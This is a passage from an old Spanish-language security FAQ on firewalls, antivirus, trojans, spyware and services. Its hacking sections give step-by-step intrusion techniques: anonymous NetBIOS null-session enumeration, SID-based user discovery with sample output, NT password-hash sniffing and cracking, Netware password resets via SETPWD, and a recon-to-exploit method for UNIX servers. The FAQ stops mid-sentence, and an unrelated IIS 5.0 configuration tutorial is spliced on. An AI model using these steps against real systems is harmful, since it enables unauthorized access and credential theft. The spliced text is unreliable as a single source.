los puertos que quieras: Add --> y eliges el tipo de servicio (Web, FTP, Mail,
News, etc). Si pulsas "Custom" puedes elegir el protocolo (TCP o UDP) y el
puerto.

* A cada aplicación añádele UDP port 53.

* En la pestaña "access permission" activa "Always allow access" para que no te
pregunte por las comunicacione permitidas.

Ejemplos de servicios, protocolos y puertos permitidos a algunos programas:
- Gestor de news, por ejemplo Agent: News server (TCP 119 ), UDP 53, SMTP TCP
25.
- Gestor de descargas, GetRight: FTP (TCP 21), UDP 53, TCP 80
- Navegador, por ejemplo Netscape: Webs server TCP 80, 8080, 8000, UDP 53,
páginas seguras SSL (TCP 443), FTP (TCP 21)
- Gestor de correo, por ejemplo Netscape Messenger: Mail SMTP (TCP 25), Mail
POP (TCP 110), UDP 53
- Internet Explorer: Webs server TCP 80,8080, 8000, UDP 53

Faltan muchos servicios importantes, así como el filtrado de paquetes ICMP
(entre ellos el ping), pero alcanza para brindar una idea somera sobre el método
de configuración.

Linux:
Existe un programa de Solsoft bastante interesante, con el que se puede
configurar no solo firewalls de todo tipo (ipchains, ip-tables, etc), si no
también las ACL de routers y switches.
En realidad puede ser un poco complicado de usar al principio, pero es una
herramienta bastante potente. Además, la versión para Linux (NP Lite 4.1) es
gratis.
Se puede bajar de www.solsoft.com/products/net_partitioner.html

3.4) ¿Cómo puedo probar mi firewall para saber si es seguro?
Lo ideal es hacer un escaneo de puertos desde otro ordenador. En el caso de
estar probando la seguridad de un ordenador conectado a Internet lo ideal es
hacer el escaneo desde otro ordenador conectado a Internet (no desde la LAN
interna).
Herramientas que ayudan en el escaneo son nmap (la versión de Linux puede
encontrarse en www.insecure.org/nmap, la de Windows NT en
www.eeye.com/html/Databases/Software/nmapnt.html, SAINT (www.wwdsi.com/saint/) y
Nessus (www.nessus.org) entre otras.
Alternativamente, si no se dispone de ninguna de estas herramientas, existen
sites en Internet que permiten realizar el escaneo desde los mismos. Estos son
algunos de ellos:
* www.secure-me.net/scan
* https://grc.com/x/ne.dll?bh0bkyd2
* http://scan.sygatetech.com/

3.5) Mi firewall da una alarma. ¿Se han metido en mi ordenador?
Ante todo no hay que dejarse llevar por el pánico. Cuando el cortafuegos avisa
que estamos siendo "atacados" no significa que nos hayan metido un troyano (BO,
Sub7 y compañía) ni mucho menos que alguien se haya introducido en nuestro
sistema.
Ese aviso significa simplemente que el presunto ataque a sido bloqueado con
éxito, ya que si dicho ataque hubiese tenido éxito, el cortafuegos no diría ni
mu.

3.6) Pero es que me están escaneando los puertos continuamente. ¿Para qué lo
hacen?
Normalmente esos escaneos sirven para saber que "puertas" están abiertas para
poder introducirse por ellas en nuestro sistema. Tambien son usados para buscar
troyanos a la escucha que esten instalados en nuestro ordenador.

3.7) ¿Entonces me están atacando?
Ante todo hay que dejar bien claro que no todos los "ataques" de los que nos
avisa el cortafuegos lo son en realidad. Existen servicios y programas que
pueden hacer saltar la alarma. Algunos de los ejemplos más conocidos son los
programas de Microsoft, Word, Visual C++, etc. Todos estos programas intentan
crear una conexión con los servidores del tío Bill (y solo los dioses y Gates
saben por qué). Tambien los servicios tipo "messenger" (MS, Yahoo, AOL, etc.),
clientes de ICQ/IRC, chequeos de actividad por parte del ISP e incluso el
chequeo del buzón de correo electrónico suelen provocar la alarma, dependiendo
de que firewall se utilice y de las reglas que hayan sido creadas y/o
(des)activadas. Cualquier programa o servicio para el que no se haya creado una
regla específica, provocará un aviso de ataque tipo BO, Sub7, Netbus, etc.
dependiendo del puerto que intente usar dicho programa o servicio.

3.8) ¿Cómo sé si la alarma es debida a un ataque o no?
Existen varios factores a tener en cuenta:
a) Los escaneos proceden siempre de la misma IP o de la misma "subred".
b) Con "netstat" nos es posible averiguar: qué conexiones o servicios tenemos
abiertos, qué puertos son utilizados por estos y cuales son las direcciones IP
de dichas conexiones. Como alternativa se puede usar el programa para Windows
"TCPView" (http://www.sysinternals.com/ntw2k/utilities.shtml). Estas
informaciones nos ayudarán a determinar si estamos siendo atacados.
c) El nombre del host y el puerto utilizado dicen bastante a la hora de
descartar posibilidades para determinar si se trata de un ataque o de algo más
inofensivo.

Pongamos un par de ejemplos:

msgr-ns16.msgr.hotmail.com

En este caso está claro que nuestro Messenger intenta chequear nuestro correo en
Hotmail.com.

pepito-dialup-7.nuestro-isp.es
pepito-dialin-7.nuestro-isp.es

Aquí existe un chequeo de actividad en la conexión por parte de nuestro
proveedor para mantenerla en el caso de haber actividad o cortarla.

3.9) Se ha confirmado mi sospecha y es un ataque. ¿Qué hago?
Si el ataque procede de la misma IP resp. subred y ademas es constante, la forma
mas elegante y menos complicada de acabar con dicho ataque es la siguiente:
En www.ripe.net o www.nic.com se puede averiguar (usando "whois")a quien
pertenece esa IP. Normalmente sera un ISP. Entre toda la informacion que
obtenemos, se encuentra una direccion de e-mail para contactar con el ISP. Se le
envia un mensaje explicandole la situacion. Recomendable seria tambien enviarles
una copia del log de la FW, donde este reflejado cuando y con que frecuencia a
tenido lugar dicho ataque. Despues se encargara el ISP de llamar al orden a
nuestro "aspirante a hacker".
Si el problema es realmente grave, se pueden seguir los lineamientos del punto
9.3 de las presentes PUF.







Sección 4: Antivirus

4.0) ¿Qué es un virus?
Un virus es un organismo viviente que tiene la habilidad de infectar células
sanas y replicarse utilizando los recursos de la célula.
Un virus informático es un código que tiene la habilidad de infectar ordenadores
sanos y replicarse desde los mismos, por la similitud en el comportamiento se
los llamó virus.
Un virus puede o no contener carga destructiva, hubo virus que luego de infectar
un ordenador se limitaban a mostrar un mensaje pacifista y luego se
auto-eliminaban. Sin embargo es muchísimo mayor la cantidad de virus que SI
tienen carga destructiva.
La destrucción causada por un virus puede ser desde muy sencilla hasta
prácticamente imposible de reparar, según las acciones que realice el código.
Tomando en cuenta el peor caso posible, es vital tener siempre un antivirus
actualizado en el ordenador.

Tipos de Virus (esta lista puede no ser excluyente)

Virus de arranque:
Se ejecutan al iniciar el sistema. Suelen estar en el MBR o en el sector de
arranque.

Companion-Virus:
Tienen el mismo nombre de otros ficheros ejecutables (p.ej. msinm.exe) solo que
tienen la terminación ".com" en vez de ".exe". Debido a un vieja regla de DOS,
se ejecutan primero los ficheros ".com".

Virus de ficheros:
Infectan programas (*.exe), de forma que al ejecutar dicho programa, se ejecuta
tambien el virus.

Virus de sistema de ficheros:
Destruyen las particiones FAT.

Virus de macro:
Virus creados con un leguaje de macros (p.ej VBA).

Virus polimórficos:
Son aquellos que hacen copias de si mismos, cambiando su código, para dificultar
su detección.

Retrovirus:
Estan programados para atacar programas antivirus.

Virus stealth:
Estos virus se camuflan como ficheros de sistema y son muy dificiles de
detectar.

Puedes encontrar más datos en las FAQ de es.comp.virus

4.1) ¿Hay antivirus para Linux?
Si bien los virus para Linux no son tan abundantes como en otros sistemas
operativos, siendo mucho más frecuentes los Internet worms (programas que se
limitan a autorreplicarse, pero esto puede deberse en parte a la menor cantidad
de ordenadores con Linux, de modo que es de esperarse que a futuro existan más.
Por otra parte un potencial virus de Linux, por la misma estructura del sistema
operativo, sólo sería dañino si se activara con la cuenta de administrador
(root), y ese es uno de los tantos motivos por los cuales dicha cuenta debe
usarse solamente cuando SE NECESITE hacer administración al sistema.
En los sistemas Linux son más habituales los troyanos, que suelen ser del tipo
rootkit (kit de herramientas para ser 'root').
Para información sobre eliminación de rootkits puede consultarse
www.chkrootkit.org
Cabe mencionar que hay antivirus que corren sobre Linux, pero detectan virus de
Windows. Sirven cuando utilizamos un servidor Linux corriendo Samba como
fileserver o printserver de una red de estaciones de trabajo Windows, para
proteger a estas últimas.
Asimismo existen antivirus para servidores de correo, que se encargan de
eliminar los virus que llegan por este medio, y que podrían afectar a las
estaciones de trabajo MS Windows.

4.2) ¿Cuál es la diferencia entre un firewall y un antivirus?
El firewall solamente te protege contra intrusiones a través de la red.
El antivirus solamente te protege contra los virus y algunos troyanos.







Sección 5: Anti-Troyanos

5.0) ¿Qué es un troyano?
Es un programa que parece ser legítimo, pero en realidad oculta código maligno
(malware) normalmente destinado a facilitar la entrada de un atacante, o
asegurar su retorno: bien abriendo las puertas para ello, bien ocultando
información al legítimo usuario para impedir la detección de la entrada y/o
cambios efectuados en los programas legítimos de la máquina.
Un ejemplo de troyano sería un 'netstat' que ocultara un puerto abierto, en el
que podría estar a la escucha otro troyano, denominado en este caso backdoor.
Puedes encontrar más información sobre troyanos en
http://members.nbci.com/zonealex/puertos.htm y
www.simovits.com/trojans/trojans.html
Otra web, con capturas de pantallas de algunos troyanos, es
www.globalframe.f2s.com

5.1) En el punto 4.2 se menciona que los antivirus detectan solamente algunos
troyanos. ¿Qué pasa con los demás?
Algunos troyanos no son detectados por los antivirus, por diferentes motivos
(que las casas de antivirus expliquen los mismos).
Afortunadamente existen programas que son específicamente para eliminar troyanos
(y no se ocupan de los virus). El más conocido es el programa "The Cleaner",
shareware que puede obtenerse de www.moosoft.com

5.2) ¿Cuáles son los troyanos/backdoors mas comunes y más peligrosos?
Los backdoors o puertar traseras son software que abre un puerto a la escucha a
escondidas del legítimo propietario de la máquina que lo ejecuta, con la
intención de facilitar la entrada a un hipotético atacante.
Estos backdoors necesitan haber sido ejecutados por primera vez en el sistema,
para ejecuciones posteriores ya toman las medidas adecuadas que las aseguren,
dependiendo del sistema. En Windows 9x se añaden a la clave del registro
adecuada, por ejemplo en las claves ejecutables en:

   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunOnce
   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunEx
   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunServices
   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current
Version\RunServicesOnce

entre otras.
Esta primera ejecución puede llegar de dos formas: por un atacante que haya
conseguido control total sobre el sistema e instale el backdoor para facilitar
su regreso, o involuntariamente por el propio usuario, por error o al creer que
se trataba de otro programa.
La parte que se instala en el ordenador de la víctima se llama servidor, y el
acceso se logra mediante el cliente.
De mención histórica son el Netbus y BackOriffice (www.netbus.org y
www.cultdeadcow.com), los padres de los troyanos actuales. Ambos funcionaban
solamente en sistemas MS Windows 9x.
Desde la aparición de Netbus 2.x y BackOriffice 2000 (BO2K) su campo de acción
se extendió a sistemas MS Windows NT y 2000.
La última generación de troyanos incluye el SubSeven y SubZero, dos poderosas
herramientas que permiten control total del ordenador remoto. Pueden encontrarse
troyanos en la página (en inglés) de Archivo de Troyanos de TL Security
(www.tlsecurity.net/amt.htm)
En los sistemas Linux lo más común es el lanzamiento de un netcat en un puerto
alto para permitir el acceso a una consola remota sin autenticación o a un back
telnet.

5.3) ¿Cómo se meten usualmente los troyanos en un ordenador?
Normalmente el troyano está adosado a un archivo ejecutable, y la infección con
el troyano depende de que un usuario, ignorante de la existencia del troyano,
ejecute dicho archivo.
Los archivos ejecutables con un troyano dentro pueden provenir prácticamente de
cualquier origen: un archivo enviado por email, un archivo bajado de una página
web, etc.

5.4) ¿Cómo se oculta un archivo dentro de otro?
Aquí cabe destacar que existen dos posibilidades bastante diferentes:
a) Que se desee incluir un archivo ejecutable dentro de otro (el caso típico con
los troyanos). Esto puede hacerse con el programa eLiTeWrap
(www.holodeck.f9.co.uk/elitewrap/index.html).
b) Si lo que se desea es ocultar un archivo (por ejemplo un texto con un
mensaje) dentro de un archivo inconspicuo (por ejemplo una imagen .gif), puede
utilizarse el programa Steganos II de Centurion Soft (www.centurionsoft.com).







Sección 6: Software espía (Spyware)

6.0) ¿Qué es el spyware?
Son programas que además de su función obvia, instalan componentes que capturan
datos de nuestro ordenador (por ejemplo las páginas que visitamos) y envían
dichos datos al proveedor del programa.
Usualmente la utilidad del spyware para dicho proveedor es hacer un estudio de
mercado entre sus clientes, ya sea para uso propio o para vender esta
información a quien pueda estar interesado.
Otra posibilidad (¿Windows XP?) es informar al proveedor del software sobre los
ordenadores donde el mismo está instalado, principalmente para controlar la
piratería.

6.1) ¿Cómo elimino el spyware?
Existe un excelente programa freeware llamado AdAware de Lavasoft
(www.lavasoft.de) que hace una buena tarea eliminando el spyware.
Cabe destacar que en ocasiones (por ejemplo el Go!Zilla) el programa principal
deja de funcionar luego de eliminado el componente de spyware.
Existe información acerca de que el firewall Zone Alarm contiene componentes de
spyware, así como diversos programas de Microsoft.







Sección 7: Servicios

7.0) ¿De qué va eso de los servicios?
Los servicios son los que nuestro ordenador brinda siempre que estemos corriendo
algún tipo de servidor (FTP, web, etc.).
Algunos de los servicios son usualmente considerados más seguros que otros, pero
al margen de esto cabe destacar que los servicios son la principal puerta de
entrada a un ordenador por parte de los hackers.
De esto se deduce que es mejor no correr ningún servicio si realmente no se lo
necesita. Lo mejor es adoptar una política de "denegar todo" por defecto, y
activar solamente aquellos servicios que se vayan a utilizar.

Usualmente se puede usar tanto el número de servicio como el nombre. El flag
'-n' del netstat es para mostrarlos en forma numérica.
La lista que utiliza windows para ver el nombre-número asociado está en
C:\WINDOWS\Services, y en linux está en /etc/services
Ambas listas de puertos están obsoletas, la lista actualizada se encuentra en el
RFC-1700.

7.1) ¿Cómo sé qué servicios estoy corriendo?
En sistemas MS Windows la salida del comando "netstat -a" nos indicará aquellos
servicios que tengan un puerto abierto y estén a la escucha (LISTEN) o tengan
una conexión establecida (ESTABLISHED).
Usualmente un sistema MS Windows en su configuración estándar y sin correr
ningún server solamente debiera tener a la escucha los puertos de NetBIOS (137,
138 y 139). Si el sistema es Windows NT puede estar a la escucha el puerto 135
también.
Si queremos ver todos los puertos en formato numérico podemos utilizar "netstat
-an".

7.2) ¿Debo utilizar telnet y FTP?
NO.
Todo lo que se envía por telnet o FTP viaja por la red sin ningún tipo de
cifrado.
Obviamente esto no es un problema cuando se usa el FTP para bajar archivos de
Internet, pero puede ser potencialmente peligroso en otros casos.
Cuando el usuario "pepe", cuyo password es "perro" intenta un acceso mediante
telnet o FTP con autenticación a otro ordenador, por la red viajan las palabras
"pepe" y "perro" en forma clara y legible.
Existe el riesgo potencial de que alguien, munido de un sniffer, obtenga esos
datos de la red y los utilice para otros fines.

7.3) ¿Qué alternativa tengo?
Una buena alternativa es SSH (Secure SHell), disponible para Linux y MS Windows
en www.ssh.org
Otro cliente SSH para Windows llamado PuTTY está disponible en:
www.chiark.greenend.org.uk/~sgtatham/putty/

7.4) Eso es muy bueno para la consola. ¿Cómo puedo ver remotamente el entorno
gráfico?
Con algún programa que permita administración remota de entorno gráfico, tal
como el PCAnywhere (www.symantec.com)
Existe una excelente alternativa, que además es gratuita y multiplataforma
(Win/Linux/Mac), llamada Virtual Network Computing (VNC), que puede encontrarse
en www.uk.research.att.com/vnc/
Por cuestiones de seguridad es altamente aconsejable combinar VNC con SSH según
se explica en las FAQ del VNC.







Sección 8: Conexión por red

8.0) ¿Cómo puedo ver la IP de otra persona?
O bien se la preguntas, él o ella tendrá que poner 'ipconfig' (Windows NT) o
'winipcfg' (Windows 9x/ME) en una pantalla MSDOS o bien cuando te envíe un
mensaje miras en las propiedades y veras la IP, por medio de messenger o ICQ
cuando le estés o te esté enviando un fichero, vas a MSDOS y escribes 'netstat
-an'
En Linux el comando ipconfig es ifconfig, sirve para configurar las interfaces
de red, pero si se invoca sin parámetros permite ver la IP. El netstat tiene la
misma sintaxis, se recomiendo invocarlo con 'netstat -a -tu'.

8.1) ¿Cómo puedo averiguar recursos compartidos, usuarios y grupos de máquinas
Windows?
Ante todo aclaro que para que esto sea posible debe poder establecerse tráfico
de red a los puertos NetBIOS (137-139) de la máquina remota, si están bloqueados
(por ejemplo mediante un firewall) o desactivados no es posible.
La enumeración de carpetas e impresoras compartidas puede hacerse con el comando
net, utilizando la sintaxis:

  net view \\maquina

Puedes obtener ayuda sobre el comando net con:

  net help

Y más ayuda sobre el uso de un comando en particular con:

  net help comando

Por ejemplo 'net help view'.
En aquellos casos donde al intentar enumerar recursos compartidos os informe que
no estáis autorizados a hacerlo, no está todo perdido. Windows NT y Windows 2000
por defecto permiten establecer una conexión anónima con el siguiente comando:

  net use \\maquina\IPC$

o

  net use \\maquina\IPC$ "" /user:""

Luego de esto podéis intentar nuevamente con el 'net view \\maquina'
Otras herramientas para enumerar recursos compartidos son DumpSec
(www.somarsoft.com), Legion (www.splitsecond.nu), NAT (NetBIOS Auditing Tool,
pueden encontrarse versiones para Linux y para Windows en
www.ussrback.com/NT/scanners/index.html) entre otras.
El comportamiento por defecto de permitir conexión anónima puede cambiarse en
Windows NT con SP3 o superior y en Windows 2000, para ello es necesario crear
una clave en la Registry (consultar por 'Null Session' en la Microsoft Knowledge
Base).
La enumeración de usuarios y grupos usualmente requiere que hayáis establecido
una conexión anónima como se indica más arriba.
El método más sencillo es utilizar el comando nbtstat de la siguiente forma:

  nbtstat -a nombre_maquina

o

  nbtstat -A IP_maquina

Que os mostrará una información similar a la siguiente:

  C:\nbtstat -A 204.16.2.8
  NetBIOS Remote Machine Name Table
  Name                   Type     Status
  -----------------------------------------------------------
  ALEPH            <20> UNIQUE  Registered
  TESTER           <00> UNIQUE  Registered
  GOONIES          <00> GROUP   Registered
  TECNICO          <03> UNIQUE  Registered
  LUIS             <1D> UNIQUE  Registered
  ADMINISTRATOR    <03> UNIQUE  Registered
  ..__MSBROWSE__.. <01> GROUP   Registered

  MAC Address = 00-C0-4F-86-80-05

El número hexadecimal entre <> es el que os permitirá conocer los nombres de
usuarios en uso en ese momento, los <03> son usuarios (en el ejemplo
ADMINISTRATOR y TECNICO).
Para más información sobre el significado de estos valores hexadecimales podéis
consultar el libro Using Samba, que puede comprarse, o bajarse en formato PDF y
consultarse online en www.oreilly.com
DumpSec, ya mencionado, también permite enumerar usuarios y grupos.
Dos excelentes herramientas para enumerar usuarios en sistemas Windows NT y
Windows 2000 son sid2user y user2sid (www.chem.msu.su:8080/~rudnyi/NT/sid.txt)
que funcionan siempre que pueda establecer tráfico NetBIOS, no siendo necesario
establecer una conexión anónima.
Con user2sid obtenéis primero el identificador (SID) de la máquina:

  C:\user2sid \\192.168.202.33 "domain users"

  S-1-5-21-8915387-1645822062-1819828000-513

  Number of subauthorities is 5
  Domain is WINDOWSNT
  Length of SID in memory is 28 bytes
  Type of SIS is SidTypeGroup

El SID es el número S-1-5-21-8915387-1645822062-1819828000-513
Ahora bien, podéis utilizar ese número, sin el S-1 y los guines separadores,
para enumerar uno a uno todos los usuarios de la máquina remota:

  C:\sid2user \\192.168.202.33 5 21 8915387 1645822062 18198280005 500

  Name is admin
  Domain is WINDOWSNT
  Type of SID is SidTypeUser

Lo único que tenéis que hacer es omitir el S-1, los guiones, y colocar al final
(separado por un espacio) el identificador de usuario (RID), en el ejemplo 500,
que corresponde al Administrator.
Los RID a probar son los siguientes:

  500 - Administrator
  501 - Guest
  1000, 1001, 1002, etc. - Usuarios

Esta herramienta funciona aún cuando las cuentas se hayan renombrado (el RID 500
es el Administrator, aún cuando lo hayan renombrado a Pepe, y de esta forma os
enteráis del nombre que se está utilizando).







Sección 9: Hacking

9.0) ¿Cómo puedo obtener la clave del Administrador en un Windows NT/2000?
Ante todo aclaremos que no hay recetas mágicas.
Dado que lo usual es que no se tiene acceso a los DC, lo ideal es utilizar un
sniffer para capturar los hashes de los passwords de los usuarios directamente
desde la red, para luego hacer un proceso de crackeo off-line.
Un reconocido crackeador de passwords de Windows es el programa L0phtcrack
(www.l0pth.com), que no solamente permite hacer el proceso de crackeo, sino que
además incorpora un sniffer dentro del mismo paquete.
En caso de tener acceso a los DC, puede intentarse el uso del programa pwdump2
(www.webspan.net/~tas/pwdump2/), que inserta su código dentro de un programa en
RAM con privilegios administrativos, y realiza un vuelco de la SAM, en forma de
texto, a la pantalla. Luego este archivo puede utilizarse conjuntamente con el
L0pthcrack para crackear los passwords
Todo lo antedicho funcionará sobre Windows NT, y sobre Windows 2000 solamente
sobre aquellas cuentas que NO se encuentren almacenadas en AD.

9.1) ¿Cómo pueden violar la seguridad de mi servidor NOVELL?
Existe un FAQ (en inglés) al respecto en www.nmrc.org/faqs/netware/index.html

Adicionalmente tenemos el siguiente texto:

BOLETIN N° 9 Forma de Crackear los Password en un servidor Netware

Existen varias formas de lograrlo, por defecto se asume que la opción de
Intruder Detection está Off, también que la opción unencryted password está
habilitada y por último que existe la posibilidad de plantar un programa
Password Catcher.....
La funcionalidad de Intruder Detection On es proteger el servidor contra los
ataques de los programas Sniffers...los cuales pueden ser introducidos vía ftp,
telnet o en servidores www o a través de un e-mail al Webmaster del
Intranetware....

Novell ha facilitado a los administradores de red formas para controlar estos
ataques...Las últimas versiones del programa LOGIN:EXE encriptan los paswords
antes de transmitirlos por el medio (cableado), el administrador debe asegurarse
en tener las últimas actualizaciones de dicho programa. En versiones anteriores
de shell tal como NEXT (para mantener compatibilidad con viejas estaciones de
trabajo) se debe colocar la siguiente instrucción en la cónsola o en el archivo

  AUTOEXEC.NCF:

  SET ALLOW UNENCRYPTED PASSWORDS=ON

Por defecto está Off después que se realiza la instalación.

Si el Craker tiene acceso remoto a la consola puede resetear los passwords con
los siguientes NLM:

 MODULO NLM       Cuenta       Netware version(s) supported
------------ ----------------- ----------------------------
SETSPASS.NLM   SUPERVISOR                  3.x
SETSPWD.NLM    SUPERVISOR             3.x, 4.x y 5
 SETPWD.NLM    cualquiera             3.x, 4.x y 5

Se puede plantar un programa password catcher o un lector Keystroke para obtener
los passwords cuando los usuarios hagan login a la red. El programa LOGIN.EXE
está localizado en SYS:LOGIN y normalmente está protegido contra los accesos no
autorizados. El sitio más apropiado para que los Crackers coloquen uno de éstos
programas de captura de password es en una estación de trabajo con el atributo
Hidden habilitado (puede ser de forma remota). La desventaja para el
administrador es que Netware ni se enterará de la existencia de ese programa.
Existe una ubicación aún mejor para el Cracker, que puede ser una máquina de
acceso común, tal como PcAnywhere utilizada para acceso remoto. En muchas
instalaciones se permite que PcAnywhere tenga acceso a las demás máquinas
clientes de la red y solo confiando en las caraterísticas de seguridad ofrecidas
por Netware.

3-Crackear con el SETPWD.NLM

Vía RCONSOLE, se pueden cambiar los password en SYS:SYSTEM de la siguiente
forma:

Para Netware 3.1X

  LOAD [SYS:SYSTEM]SETPWD [username] [newpassword]

Para Netware 4.XX y 5

  LOAD [SYS:SYSTEM]SETPWD [username] [newpassword]

Si el servidor tiene replicación, entonces el Cracker tendrá acceso a todos los
servidores.

Tomado de: Anti Online y New Order magazines.
Probado en: Laboratorio de AAIAA C.A.

9.2) ¿Cómo pueden violar la seguridad de mi servidor UNIX/Linux?
Si descontamos el caso de un ID de usuario conocido que tenga su password nulo,
igual al user ID, o la palabra 'password', necesitaremos hacer una investigación
preliminar.
Lo primero sería colectar cuanta información sea posible sobre el sitio en
cuestión. Podemos consultar catálogos para obtener direcciones de email, páginas
web, grupos de noticias, la base de datos que contenga las direcciones IP
asignadas a ese sistema (ARIN, RIPE, APNIC), el registro de dominio (InterNIC),
etc.
Luego puede hacerse un escaneo de los puertos para conocer los servicios
disponibles e intentar averiguar el tipo y versión de los mismos. Por ejemplo,
si está corriendo un servidor web en el puerto 80, podemos averiguar su versión
de la siguiente forma:

  $ telnet dirección_IP 80
  HEAD / HTTP/1.0
  {presionar ENTER un par de veces}

Entre los headers de la respuesta tendremos el tipo (Apache, IIS, etc.) y la
versión (por ej. IIS 4.0), salvo que el servidor esté configurado para no
brindar esta información (lo cual es una excelente idea, hay que consultar la
información del servidor para aprender cómo se configura este comportamiento).
De forma similar, utilizando telnet o netcat, podremos informarnos sobre los
distintos servicios disponibles.
Conociendo el tipo y versión de los servicios, podremos buscar xploits en alguno
de los sites mencionados en el punto 18.0, hacer pruebas del xploit en nuestra
LAN de pruebas, y una vez conocidos los detalles aplicarlo al site destino.

Si tenemos acceso mediante login local como usuarios comunes, el mecanismo es
similar pero aplicando xploits locales, que son más abundantes.
Dado que cada sistema estará configurado de manera diferente, con diferentes
versiones de los servicios configuradas de variadas formas,
#25
 
Internet Information Server 5.0  

Internet Information Server es un servidor web, que incluye los servicios de: HTTP, HTTPS, FTP, SMTP (correo saliente) y NNTP (grupos de noticias). Además es capaz de ejecutar varios motores de script como : ASP, PHP, Cold Fusion, etc ...

A diferencia de su hermano menor IIS 4.0, la nueva versión del Internet Information Server (IIS) 5.0 está incluida en el sistema operativo (S.O) Windows 2000 Server, Advanced Server y ahora tambien en Windows XP Proffesional y Server, si no indicamos lo contrario durante la instalación del S.O esta aplicación se instalará por defecto con los servicios web y smtp, no instalándose el servidor nntp para los grupos de noticias ni el ftp que debería especificarse si se quieren instalar.

Si por el contrario no se ha instalado IIS 5.0 es necesario ir a Mi PC -> Panel de Control -> Añadir o quitar programas y seleccionar "añadir y quitar componentes de Windows" (figura 1), seleccionar Internet Information Server, nos pedirá el cd de Windows 2000 o Windows XP para copiar e instalar el software.

Una vez instalado para acceder al panel de control del IIS 5.0 tenemos que ir a Inicio -> Programas -> Herramientas de administración - > Internet Information Server, obtendremos la MMC (Microsoft Managemente Console), figura 2, que es el panel de control para el IIS 5.0 desde donde administraremos, instalaremos y modificaremos nuestros Webs. Por defecto cuando se instala el IIS 5.0 se crea :
·   Un Site principal (Default Web Site)
·   Un Site de administración, donde están las ayudas y las páginas de administración del IIS 5.0 en html, por seguridad este Site siempre se instala en otro puerto distinto al 80.
·   Servidor SMTP
·   El servidor NNTP para los grupos de noticias debe seleccionarse si se quiere instalar, al igual que el servidor FTP.
El IIS 5.0 por defecto se instala en los siguientes directorios:

  %Systemroot%\System32\InetSrv
  %Systemroot%\System32\InetSrv/IISAdmin
  c:\InetPub
  C:\Winnt\Help\IISHelp

El directorio del web por defecto es c:\inetpub\wwwroot

También instala dos usuarios por defecto para el acceso anónimo a los Webs:

  IUSR_Nombre_de_Maquina
  IWAM_Nombre_de_Maquina

A partir de ahora hay que configurarlo y crear nuevos Web Sites.
Configuración del Web por defecto.
Una vez instalado, como he comentado antes, se crea por defecto el "default Web Site" y hay que configurarlo y optimizarlo, para eso con el botón derecho hacemos click en sobre el "Default Web Site" y seleccionamos "Propiedades" (figura 3), aquí nos encontramos un panel con múltiples opciones, éstas sirven para la configuración y optimización del Site, a continuación describiremos las opciones más importantes :

Web Site: Esta opción nos va a servir para dar nombre a nuestro Site (en la consola del IIS) un nombre descriptivo para que nosotros identifiquemos el Web, para poner la IP del Web (si tenemos varias, recordemos que con el IIS 4.0 y 5.0 se pueden poner múltiples Sites con una misma IP), el botón "Advanced" nos permitirá colocar el Host Header name (el nombre del web) o lo que es lo mismo poner la url www.depruebas.com (sin el http://) (figura 4), además esta opción nos permite también poner múltiples nombres de dominio al mismo Web, supongamos que tenemos un Web con tres dominios que apuntan al mismo Web y que contienen las mismas páginas, pues sólo es necesario ir añadiéndolos en esta opción el nombre de dominio y la ip (que podría se la misma para todos). Desde esta opción también podemos cambiar el puerto que por defecto es el 80 a otro que nos interese más. Por ejemplo, podríamos cambiarlo al puerto 81 y acceder al web de la forma http://www.depruebas.com:81.

Operators: Por defecto los operadores del web son los usuarios con permisos de administrador en Windows 2000. El IIS tanto la versión 4.0 como la 5.0 utilizan la seguridad del sistema operativo Windows NT para el IIS 4.0 y Windows 2000 Server o Advanced Server para IIS 5.0.

Performance: También podemos optimizar el rendimiento del Site en función de los usuarios que esperamos nos visiten.

ISAPI Filters: Los filtros ISAPI (Internet Server Application Programming Interface) son programas (DLL por lo general y escritos en C++ ) que interactúan con el IIS, se utilizan para crear extensiones y filtros para el IIS.
Home Directory :Desde este panel (figura 5) decidiremos donde se alojaran las páginas de nuestro web, tenemos tres opciones:
·   En un ordenador de la red y accedemos al directorio como una unidad compartida
·   o lo redirigiremos a otra URL.

Por defecto y si no se cambia desde esta opción las páginas físicas del Web se sitúan en c:\inetpub\wwwroot en el mismo servidor donde esta el IIS.

También tenemos varias opciones interesantes:
·   Read : el site dejara que las páginas sean accedidas para leer
·   Write: permitirá hacer Uploads al directorio que se especifica arriba.
·   Directory Browsing: permite hacer un listado del directorio.
·   Log Visits: crea un registro de los visitantes del site.
·   Execute Permissions : Configura la seguridad a nivel de archivos y páginas que se pueden ejecutar.
o   none no ejecuta nada y solo procesa paginas HTML
o   Scripts only permite la ejecucion de paginas asp, html y codigo de scripting.
o   Scripts and Executables permite ejecutar codigo scripting y programas.

·   Application Protection: Configura la seguridad a nivel de aplicación. Hay tres formas de ejecutar una aplicación web :
o   Low nivel más bajo, donde las aplicaciones webs corren todas juntas en el mismo proceso junto a los servicios web y si una aplicación se cae, cae todo el servidor.
o   Medium donde las aplicaciones corren juntas separadas de los servicios web.
o   High donde cada aplicación corre en espacios separados de memoria y separadas de los servicios web.
Documents : A través de esta opción podemos poner un nombre de página para que se ejecute automáticamente cuando se ponga la dirección del web. Es decir, si nuestra pagina por defecto es index.asp cuando escribamos en el navegador http://www.depruebas.com el IIS mostrará por defecto la pagina index.asp.
Directory Security : La seguridad del web viene integrada en la seguridad el windows 2000, a través de esta opción daremos acceso al web a todos los usuarios o restringiremos el acceso a todos los usuarios excepto al administrador y usuarios validados o podremos determinar que IP tienen acceso al web y que IP no (figuras 6 y 7). Se pueden dar permisos para que determinados grupos y/o usuarios tengan acceso al web (si el web no es de dominio público) pero esto debemos hacerlo a través del explorador de windows con la seguridad de windows 2000. Este apartado de integración de seguridad del IIS con windows 2000 lo veremos más adelante cuando hablemos de seguridad.

